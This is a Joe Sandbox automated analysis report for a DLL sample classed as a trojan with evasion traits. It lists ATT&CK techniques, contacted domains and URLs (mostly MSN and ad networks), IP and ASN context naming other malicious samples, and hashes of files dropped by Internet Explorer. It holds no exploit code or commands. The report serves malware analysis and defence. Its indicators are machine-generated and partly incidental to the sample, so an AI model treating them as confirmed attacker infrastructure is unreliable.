Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.botman.ninja/privacy-policy	0%	Avira URL Cloud	safe
https://www.queryclick.com/privacy-policy	0%	Avira URL Cloud	safe
https://btloader.com/tag?o=6208086025961472&upapi=true	0%	URL Reputation	safe
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	0%	Avira URL Cloud	safe
https://silvermob.com/privacy	0%	Avira URL Cloud	safe
https://ad-delivery.net/px.gif?ch=1&e=0.4482105559414631	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://doceree.com/.well-known/deviceStorage.json	0%	Avira URL Cloud	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.stroeer.de/ssp-datenschutz	0%	Avira URL Cloud	safe
https://optimise-it.de/datenschutz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	2.18.160.23	true	false	high
dart.l.doubleclick.net	142.250.203.102	true	false	high
hblg.media.net	2.18.160.23	true	false	high
lg3.media.net	2.18.160.23	true	false	high
btloader.com	172.67.70.134	true	false	unknown
ad-delivery.net	104.26.3.70	true	false	unknown
assets.msn.com	unknown	unknown	false	high
web.vortex.data.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
ad.doubleclick.net	unknown	unknown	false	high
srtb.msn.com	unknown	unknown	false	high
cvision.media.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://btloader.com/tag?o=6208086025961472&upapi=true	false	URL Reputation: safe	unknown
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250	false		high
https://ad-delivery.net/px.gif?ch=1&e=0.4482105559414631	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/jacqueline-hofer-tritt-doch-nicht-zur-wiederwahl-an/ar-AAQTAnf?	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/sie-bew%c3%a4ltigen-alltagsstress-und-todesszenen/ar-AAQUall?oc	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/sport/fussball/der-fcz-zittert-und-steht-doch-ganz-oben/ar-AAQWrxt?ocid=hp	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/mehrere-tausend-menschen-demonstrieren-in-z%c3%bcrich/ar-AAQWtO	de-ch[1].htm.6.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.6.dr	false		high
https://www.botman.ninja/privacy-policy	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.6.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.queryclick.com/privacy-policy	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-st%c3%bcrzt-nach-verfolgungsjagd-mit-der-polize	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-liefert-sich-wilde-verfolgungsjagd-mit-der-poli	de-ch[1].htm.6.dr	false		high
https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=1pthyrgGIS_CP6RinMZ9JLQidWOhQxu_ti3Yy1VE1q4K	auction[2].htm.6.dr	false		high
http://www.reddit.com/	msapplication.xml6.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562	de-ch[1].htm.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.6.dr	false		high
https://srtb.msn.com:443/notify/viewedg?rid=89e9c689e4e442bc8decc0870f35ae96&r=infopane&i=1&	auction[2].htm.6.dr	false		high
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.6.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://secure.adnxs.com/clktrb?id=764680&t=1	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.6.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.6.dr	false		high
https://nextmillennium.io/privacy-policy/	iab2Data[1].json.6.dr	false		high
https://silvermob.com/privacy	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.6.dr	false		high
http://www.youtube.com/	msapplication.xml0.4.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.6.dr	false		high
https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc	de-ch[1].htm.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.6.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.6.dr	false	URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.6.dr	false		high
https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=MJ_W730GIS_QkG6Z3slmnzoRpVQc.g8KNhy8thvyLfijZDMu	auction[2].htm.6.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.6.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/bei-den-%c3%a4rzten-schauen-die-beh%c3%b6rden-einfach-weg/ar-AA	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.6.dr	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	imagestore.dat.6.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
http://www.amazon.com/	msapplication.xml1.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.6.dr	false		high
http://www.twitter.com/	msapplication.xml7.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.6.dr	false		high
https://policies.oath.com/us/en/oath/privacy/index.html	auction[2].htm.6.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
https://clkde.tradedoubler.com/click?p=195119&a=3064090&g=25021476	de-ch[1].htm.6.dr	false		high
https://outlook.com/	de-ch[1].htm.6.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"	de-ch[1].htm.6.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.6.dr	false	URL Reputation: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[2].htm.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.6.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.6.dr	false		high
https://doceree.com/.well-known/deviceStorage.json	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
http://www.nytimes.com/	msapplication.xml5.4.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/sport/other/runter-rauf-runter-wie-gc-in-genf-vom-weg-abkommt/ar-AAQYdQe?o	de-ch[1].htm.6.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.6.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/defektes-paket-mit-radioaktivem-inhalt-in-swiss-flieger-entdeck	de-ch[1].htm.6.dr	false		high
https://s.yimg.com/lo/api/res/1.2/CHE6ysqAlt744fnx0c7isA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1	auction[2].htm.6.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.6.dr	false		high
https://twitter.com/	de-ch[1].htm.6.dr	false		high
https://www.stroeer.de/ssp-datenschutz	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://optimise-it.de/datenschutz	iab2Data[1].json.6.dr	false	Avira URL Cloud: safe	unknown
https://smartyads.com/privacy-policy	iab2Data[1].json.6.dr	false		high
https://www.onlineumfragen.com/3index_2010_agb.cfm	iab2Data[1].json.6.dr	false		high
https://outlook.live.com/calendar	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com/#qt=mru	52-478955-68ddb2ab[1].js.6.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.3.70	ad-delivery.net	United States	13335	CLOUDFLARENETUS	false
142.250.203.102	dart.l.doubleclick.net	United States	15169	GOOGLEUS	false
172.67.70.134	btloader.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	526326
Start date:	22.11.2021
Start time:	14:27:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2zTgaLRFkL.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.evad.winDLL@17/115@11/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 92.8%) Quality average: 82.1% Quality standard deviation: 29.8%
HCA Information:	Successful, ratio: 68% Number of executed functions: 16 Number of non-executed functions: 54
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.203.70.208, 13.107.40.203, 131.253.33.200, 13.107.22.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 23.11.206.43, 23.11.206.17, 23.11.206.74, 152.199.19.161, 2.18.160.23, 204.79.197.203, 204.79.197.200 Excluded domains from analysis (whitelisted): a-0003.fbs2-a-msedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, ieonline.microsoft.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, ie9comview.vo.msecnd.net, cvision.media.net.edgekey.net, a-0003.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, any.edge.bing.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, clientconfig.passport.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/526326/sample/2zTgaLRFkL.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.26.3.70	http://mkklcdnv61.com	Get hash	malicious	Browse	mkklcdnv61.com/cdn-cgi/styles/main.css
172.67.70.134	0MGLPJiSa5.dll	Get hash	malicious	Browse
	wMidyLtyIL.dll	Get hash	malicious	Browse
	delta.dll	Get hash	malicious	Browse
	5555555.dll	Get hash	malicious	Browse
	5555555.dll	Get hash	malicious	Browse
	wsEUOSJMF6.dll	Get hash	malicious	Browse
	wsEUOSJMF6.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	new.dll	Get hash	malicious	Browse
	youNextNext.dll	Get hash	malicious	Browse
	gelfor.dll	Get hash	malicious	Browse
	bebys10.dll	Get hash	malicious	Browse
	INV-23373_2.dll	Get hash	malicious	Browse
	WfLJNUAm.dll	Get hash	malicious	Browse
	zuroq1.dll	Get hash	malicious	Browse
	Payment 1205_2.dll	Get hash	malicious	Browse
	girlDowTube.dll	Get hash	malicious	Browse
	tbConn.dll	Get hash	malicious	Browse
	RFQ 104RM.dll	Get hash	malicious	Browse
	RFQ 5mn00.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	tebdXHvUhB.dll	Get hash	malicious	Browse	2.18.160.23
	619b721d39f71.dll	Get hash	malicious	Browse	2.18.160.23
	619b721d39f71.dll	Get hash	malicious	Browse	2.18.160.23
	0MGLPJiSa5.dll	Get hash	malicious	Browse	2.18.160.23
	0MGLPJiSa5.dll	Get hash	malicious	Browse	2.18.160.23
	malware.dll	Get hash	malicious	Browse	2.18.160.23
	kZ45hWt9ul.dll	Get hash	malicious	Browse	2.18.160.23
	wMidyLtyIL.dll	Get hash	malicious	Browse	23.211.6.95
	wMidyLtyIL.dll	Get hash	malicious	Browse	23.211.6.95
	loveTubeLike.dll	Get hash	malicious	Browse	104.76.200.23
	Fuutbqvhmc.dll	Get hash	malicious	Browse	23.211.6.95
	data.dll	Get hash	malicious	Browse	2.18.160.23
	Kathleen.xz.0.dll	Get hash	malicious	Browse	2.18.160.23
	delta.dll	Get hash	malicious	Browse	23.211.6.95
	2021-11-15-DLL-returned-from-softwareupdatechecking.at.dll	Get hash	malicious	Browse	23.211.6.95
	delta.dll	Get hash	malicious	Browse	23.211.6.95
	5555555.dll	Get hash	malicious	Browse	23.211.6.95
	5555555.dll	Get hash	malicious	Browse	23.211.6.95
	5555555.dll	Get hash	malicious	Browse	2.18.160.23
	5555555.dll	Get hash	malicious	Browse	2.18.160.23

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	zMvP34LhcZ.exe	Get hash	malicious	Browse	162.159.133.233
	tebdXHvUhB.dll	Get hash	malicious	Browse	104.26.6.139
	Payment Swift Copy Of #U00a362,271.03.exe	Get hash	malicious	Browse	23.227.38.74
	Payment Advice...pdf....exe	Get hash	malicious	Browse	162.159.130.233
	new order.docx	Get hash	malicious	Browse	104.21.71.149
	BANK DETAILS.doc	Get hash	malicious	Browse	172.67.171.239
	VESSEL SAILING SCHEDULE FOR WEEK __ 48.ppam	Get hash	malicious	Browse	104.16.203.237
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	23.227.38.74
	Payment Advice 001-22112021.ppam	Get hash	malicious	Browse	104.16.203.237
	^^att-DHL 20180904153201117119330^PDF.exe	Get hash	malicious	Browse	172.67.200.96
	Almunif Pipes Purchase order_04212021.exe	Get hash	malicious	Browse	104.21.19.200
	ZiraatBankasi-20212211.exe	Get hash	malicious	Browse	104.21.19.200
	purchase_order.exe	Get hash	malicious	Browse	104.21.19.200
	New Order 000112221.exe	Get hash	malicious	Browse	104.21.59.22
	Payment Advice...pdf....exe	Get hash	malicious	Browse	162.159.133.233
	619b721d39f71.dll	Get hash	malicious	Browse	104.26.3.70
	619b721d39f71.dll	Get hash	malicious	Browse	104.26.7.139
	Play_VM_582497.htm	Get hash	malicious	Browse	104.18.11.207
	TEVRKPBK.EXE	Get hash	malicious	Browse	162.159.133.233
	PO.NX-48940.xlsx	Get hash	malicious	Browse	23.227.38.74
CLOUDFLARENETUS	zMvP34LhcZ.exe	Get hash	malicious	Browse	162.159.133.233
	tebdXHvUhB.dll	Get hash	malicious	Browse	104.26.6.139
	Payment Swift Copy Of #U00a362,271.03.exe	Get hash	malicious	Browse	23.227.38.74
	Payment Advice...pdf....exe	Get hash	malicious	Browse	162.159.130.233
	new order.docx	Get hash	malicious	Browse	104.21.71.149
	BANK DETAILS.doc	Get hash	malicious	Browse	172.67.171.239
	VESSEL SAILING SCHEDULE FOR WEEK __ 48.ppam	Get hash	malicious	Browse	104.16.203.237
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	23.227.38.74
	Payment Advice 001-22112021.ppam	Get hash	malicious	Browse	104.16.203.237
	^^att-DHL 20180904153201117119330^PDF.exe	Get hash	malicious	Browse	172.67.200.96
	Almunif Pipes Purchase order_04212021.exe	Get hash	malicious	Browse	104.21.19.200
	ZiraatBankasi-20212211.exe	Get hash	malicious	Browse	104.21.19.200
	purchase_order.exe	Get hash	malicious	Browse	104.21.19.200
	New Order 000112221.exe	Get hash	malicious	Browse	104.21.59.22
	Payment Advice...pdf....exe	Get hash	malicious	Browse	162.159.133.233
	619b721d39f71.dll	Get hash	malicious	Browse	104.26.3.70
	619b721d39f71.dll	Get hash	malicious	Browse	104.26.7.139
	Play_VM_582497.htm	Get hash	malicious	Browse	104.18.11.207
	TEVRKPBK.EXE	Get hash	malicious	Browse	162.159.133.233
	PO.NX-48940.xlsx	Get hash	malicious	Browse	23.227.38.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	619b721d39f71.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	619b721d39f71.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	AP_Remittance_SWT130003815_0.html	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	Order Enquiry_CRM07540001965-pdf(109KB).exe	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	0MGLPJiSa5.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	0MGLPJiSa5.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	malware.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	kZ45hWt9ul.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	wMidyLtyIL.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	wMidyLtyIL.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	loveTubeLike.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	ATT00330.HTM	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	Fuutbqvhmc.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	data.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	TELEFAX_Davidson-techOLX831OLX23AY2AY.HTM	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	Receipt_INV_460Kbps fdp.htm	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	MrBfVHgunq.exe	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	Kathleen.xz.0.dll	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	TELEFAX_SaccountyZNT142ZNT08YN8YN.HTM	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134
	Remittance-11162021.html	Get hash	malicious	Browse	104.26.3.70 142.250.203.102 172.67.70.134

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	5.239434861799844
Encrypted:	false
SSDEEP:	3:D9yRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAekKWLFdAqSmoA0aKb:JUFkduqswEkIXH40AAekKhskb
MD5:	C7A2F0B6DB20F2AEBC3CD94FC7533C0D
SHA1:	4377F1679EED282D8258818758CB39CCEFBDE616
SHA-256:	410410F76F7E95DEE831CEE4516AFEF95EEC20608F8E3569477A8C2A4E03ABB0
SHA-512:	D77005E2334813460A4E23ED00FF90B9CBDC18EFEA198EC21557B9F1BF320471E5D21F9A42AFC74B39B26B70B59B1F3D38E6D9CE753DD92F34BB5722311CC899
Malicious:	false
Preview:	<root><item name="BT_AA_DETECTION" value="{"ab":false,"acceptable":true}" ltime="1855895936" htime="30924784" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8D788003-4BE3-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	1.9004012448977132
Encrypted:	false
SSDEEP:	12:rl0YmGFIMOrEgm2p+IaCyQZI/GgCF+ULrEgm2p+IaCyQZI/GeFoyZI0G77xyZI0a:rNOGW/3yPULGW/3yjoyyLyy69lW8C6
MD5:	61F789A54984C2C7D2FEA842CFD89FA2
SHA1:	B7DBCCF3B52C31C80D1DFED9C4370D99A55B0FEC
SHA-256:	3D250A2F46C7E6CFCFD09076A67299E2E3E75977E284F66F349BD367173DFD2F
SHA-512:	ADD1889F3942CB9E20DDAD617D15CD30F6D2E0A71086E056DF3475C8035C7F6823BB946B65D0175FB99E5A6EFF9967F85F8CE5B2195E774A233DC336CC8F99EE
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................l.[..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.B.I.B.4.j.e.N.L.7.B.G.Q.5.e.z.0.u.1.c.N.y.Q.=.=.........:.......................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	329728
Entropy (8bit):	3.6032894448710744
Encrypted:	false
SSDEEP:	3072:jZ/2Bfcdmu5kgTzGtZZ/2Bfc+mu5kgTzGtQZ/2Bfcdmu5kgTzGtnZ/2Bfc+mu5kn:K264
MD5:	E5841DAE433F6E9F14A9BA72507F3F98
SHA1:	9ADF8D939A5B1D5F5CE40B6D1BEE8C6F6266376E
SHA-256:	849B3389B88864732DF0216C858284186127F8904F41189350ECF2FC6AE5AC6B
SHA-512:	352BCEDC25D671732A5FDC5C4E3E040819DFA3FBE0B618238293F50447ACF74C1859F51ECB2FADE0C8CDF1E17477286A2C96A5EB0DC00987E7271DBB62648EBA
Malicious:	false
